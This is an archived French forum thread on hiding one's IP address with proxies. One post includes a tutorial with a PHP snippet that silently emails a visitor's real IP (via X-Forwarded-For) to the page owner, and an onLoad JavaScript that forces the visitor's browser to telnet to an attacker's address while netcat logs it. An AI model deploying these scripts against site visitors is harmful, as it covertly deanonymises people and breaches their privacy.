Aller au contenu

Masquer totalement mon adresse IP

rantanplan08

Messages recommandés

nonas Compétent

nonas

Posté(e)
Posté(e)

A la base ton adresse ip est le seul moyen de connaitre ton ordinateur sur un réseau donc n'importe quel site que tu visites la voit. Après tu peux toujours passer par un proxy : ton pc --> proxy (pas chez toi) --> le net. Mais bon en général ça va bien pour le surf mais pour le téléchargement, c'est super rare de trouver un proxy rapide...

Lien vers le commentaire
Partager sur d’autres sites
Dark26 Mentor

Dark26

Posté(e)
Posté(e)
A la base ton adresse ip est le seul moyen de connaitre ton ordinateur sur un réseau donc n'importe quel site que tu visites la voit. Après tu peux toujours passer par un proxy : ton pc --> proxy (pas chez toi) --> le net. Mais bon en général ça va bien pour le surf mais pour le téléchargement, c'est super rare de trouver un proxy rapide...

tout est dit :transpi:

proxy powa, mais lenteur aussi

Lien vers le commentaire
Partager sur d’autres sites
l-_-l Nouveau

l-_-l

Posté(e)
Posté(e)

Mai bon voila Ce log reste kelk peu limiter je propose donc une solution pour lr rendre plus performant :

Comment faire de Steganos Internet Anonym Pro 6 un bon soft

Dans ce tuto je vous propose d'améliorer ce soft

Pour cela nous allons changez les proxys par default qui ne sont pas anonymes comme ils le pretendent.

Vous avez deja essayé? Vous n'avez jamais vu cette option normale elle n'y est pas.

Donc il faut passer par la Base de registre:

Demmarrer->Executer et ecrire: regedit

maintentant allez a cette adresse: 

HKEY_CURRENT_USER\Software\Steganos\InternetAnonymPro\6\SecureSurfing\Proxy\HTTP\ServerList

Vous trouverez les proxys par defaut.

Il vous suffit de les changer en mettant des proxys anonymes

Vous pouurez trouver une liste regulierement a jour ici:

http://www.anonymitychecker.com/page1.html

http://www.stayinvisible.com/index.pl/proxy_list

Voila maintenant vuos voulez testez votre anonyma

Allez sur:

http://check.sdv.fr/

Votre IP n'a pas ete trouvée?

Normal ce tuto est fait pour ca.

Votre IP est trouvée?

->Vous n'avez pas choisi de bon proxy

->Vous n'avez pas respectez le tuto

Voila maintenant vous pouvez surfer en anonym...

Lien vers le commentaire
Partager sur d’autres sites
l-_-l Nouveau

l-_-l

Posté(e)
Posté(e)

Un seul truc, puisk je me doute bien ke sa a un rapport avec le p2p ou les ng ... ( g po raison ? :pleure:)

Pour les proxy :

Alors que vous pensiez etre anonyme derriere votre proxys... Je vous demontre le contraire !

Pourquoi ? Comment ?

Simplement par ce que le proxy utilise le protocole HTTP, et n'est fonctionnel qu'a travers

les structures utilisant HTTP, or la j'ai engendre sur votre navigateur une connexion Telnet

a mon serveur sur le port 25 (sendmail) ...

Je verrai alors dans mes logs votre vraie IP c'est une application reelle !

Mais le meilleur n'est pas la ...

Ici j'ai utilise une connexion reelle de Telnet qui se dirige vers un serveur SMTP dump

mais j'aurais tres bien pu rediriger la connexion vers une petite application qui se

charge de garder les logs et DANS CE CAS VOUS N'AURIEZ SIMPLEMENT RIEN VU !

Donc ne croyez pas que le proxy soit quelque chose de fiable, bien au contraire !

-------

En fait je vais vous exposer ici quelques techniques vous permettant de recuperer l'IP reelle d'un gars se

connectant au net par l'intermediare d'un proxy. En effet dans ce cas vous voyez l'IP du proxy, et non la sienne.

C'est le but d'ailleurs, non ?

Mais on va pas se laisser demonter %-)

Donc je vais exposer 2 methodes.

* 1 ere methode, est en fait un melange d'infos recoltees sur le net et de reflexion personnelle (et vui je reflechis !!!

si je vous assure !!!) qui vous permettra de recevoir dans votre boite mail l'IP d'un gars qui se promene sur une de vos

pages sur un site. Pour cela votre site doit etre heberge sur un serveur supportant PHP, avec la fonction mail();

activee (actuellement c'est le cas de Lycos/Multimania, les autres je sais pas).

L'idee est donc que les proxies sur lesquels se connectent les gars envoient souvent dans le Header des infos,

dont la fameuse IP. Ces donnees envoyees par le serveur se nomment les VARIABLES D'ENVIRONNEMENT. Les variables

d'environnement standard permettent d'ailleurs de recuperer l'IP d'un gars, mais ce n'est pas le but de notre tuto...

Ici nous nous interesserons aux variables d'environnement propres aux proxies HTTP, qui sont au nombre de 6 : 

HTTP_PRAGMA Ancien mecanisme de gestion des methodes de cache des pages d'un serveur HTTP 

HTTP_CACHE_CONTROL Indication concernant les preferences du client HTTP en matiere de cache 

HTTP_CACHE_INFO Utilise par certains proxys pour indiquer au serveur HTTP combien de clients HTTP 
ont effectue cette requete par son intermediaire 

HTTP_PROXY_CONNECTION Seulement definie par certains proxys lorsque le client HTTP effectue sa requete par leur intermediaire 

HTTP_VIA Adresse, port utilise, nom et version du proxy utilise pour la requete. Seulement definie par certains proxys 

HTTP_X_FORWARDED_FOR Utilise par certains proxys pour indiquer l'adresse de la machine cliente pour laquelle 
ils effectuent la requete HTTP

Je tiens d'ailleurs a remercier ici "Le Lamerz" (qui n'en est pas un d'ailleurs !!!) pour ces precieux renseignements !

^_^ Merci

Ici la variable qui nous interesse est la derniere, HTTP_X_FORWARDED_FOR, qui contient l'IP du gars derriere le proxy.

L'idee est donc que le serveur sur lequel est heberge votre page PHP lit les informations envoyees par le proxy se connectant

a lui, donc cette variable. Il est donc capable de la restituer par la fonction PHP getenv("param"); qui recupere la variable

d'environnement nommee "param". Donc

Code: 

<?php $vraieip = getenv("HTTP_X_FORWARDED_FOR"); ?>  

demande a votre serveur d'hebergement de stocker dans la variable $vraieip la vraie IP, c'est a dire le contenu de la

variable d'environnement HTTP_X_FORWARDED_FOR. Vous pouvez l'afficher a l'ecran pour faire peur au gars, avec

"print $vraieip;"

mais notre but est de la recuperer discretement, en nous l'envoyant par mail. Il suffit de coder ceci :

Code: 

<?php 
$vraieip = getenv("HTTP_X_FORWARDED_FOR"); 
mail("votre_mail@serveur.ext", "IP recoltees sur ma page internet", $vraieip); 
?>

et si comme je vous le disais au debut votre serveur d'hebergement accepte la fonction mail(); c'est dans la poche !

Pour ma part j'ai inclut ce script une journee sur mon site, juste pour tester, mais j'ai ete litterallement mail bombe !!!

En effet le serveur renvoie l'IP a chaque reactualisation. Je l'ai donc vite retire, puisque de toute facon mon but n'est pas

de hacker mes visiteurs.

PAr contre si le gars ne passe pas par un proxy, la variable reste vide, vous devez donc envoyer par mail l'IP provenant de

HTTP_X_FORWARDED_FOR, mais aussi celle de la variable d'environnement classique permettant de recuperer l'IP normale

(dans un autre tuto peut-etre je vous ai dit !!!)

* Une 2eme methode, touvé sur un forum (lekelle je c plus fo ke je fouille dans mes bookmark)

Elle consiste toujours a amener le gars sur une page internet concoctee par vos soins :byebye:

Cette fois-ci pas besoin de PHP, juste un script javascript, a lancer au chargement de la page, le voici :

Code: 

<script TYPE = "text/javascript"> 
function Gruss() 
{ 
window.location.href = 'telnet://Newffr.zzn.com:25' 
} 
</SCRIPT> 

<body onLoad = "Gruss()">

Maintenant mes explications et eclaircissements apres analyse

Vous devez remplacer Newffr.zzn.com par votre serveur, ou mieux votre machine (entre votre IP, je sais c'est dangereux).

C'est ici qu'intervient l'utilisation du logiciel NetCat (ce qu'il appelle l'application qui garde les logs, c'est ca !)

fourni avec un tuto d'explication. Il suffit dans le script de mettre votre IP au lieu du serveur, et sur votre machine

de lancer NetCat en mode ecoute (listen) sur le port 25 (port sendmail). La commande est, apres avoir lance natcat,

"-l -p 25".

Ainsi vous ecoutez tout ce qui vient sur votre port 25.

Dans notre exemple le script ouvre chez la victime ouvre son port telnet (23) et se connecte a votre IP au port 25.

Le script si votre IP est 145.167.4.34 sera :

Code: 

<script TYPE = "text/javascript"> 
function Gruss() 
{ 
window.location.href = 'telnet://145.167.4.34:25' 
} 
</SCRIPT> 

<body onLoad = "Gruss()">

Cette technique oblige donc le navigateur du gars a se connecter a votre IP sur votre port 25.

En effet les proxies filtrent les connections HTTP (port 8080), mais pas Telnet (25), donc le fait d'obliger le gars a

se connecter a votre serveur (netcat en fait) vous devoilera son IP en regardant dans vos logs de netcat.

Voilou c tou. :craint:

Sinon le mieux c dinterdire le scan de ton pici par des pc de la riaa ou dotre organisme (detestable a mon gout)

ici ou avec notre amis google

Lien vers le commentaire
Partager sur d’autres sites
KzR Mentor

KzR

Posté(e)
Posté(e)

le mieux c'est d'avoir accès à plusieurs Proxy très rapide comme le font les organisations pirates, en effet certaines ont plusieurs Proxy latents dans des pays "tranquilles" et là pour les retrouver... impossible, car les Proxy sont réglés pour effacer les traces de leurs inter-connexions...

il faudrait "Pirater" leur proxy pour les identifier... mais bon en général, ils savent se protéger :craint:

donc c'est possible, mais il faut du fric et des connaissances assez poussées :pleure:

Lien vers le commentaire
Partager sur d’autres sites

Archivé

Ce sujet est désormais archivé et ne peut plus recevoir de nouvelles réponses.

Aller sur la liste des sujets
×
×
  • Créer...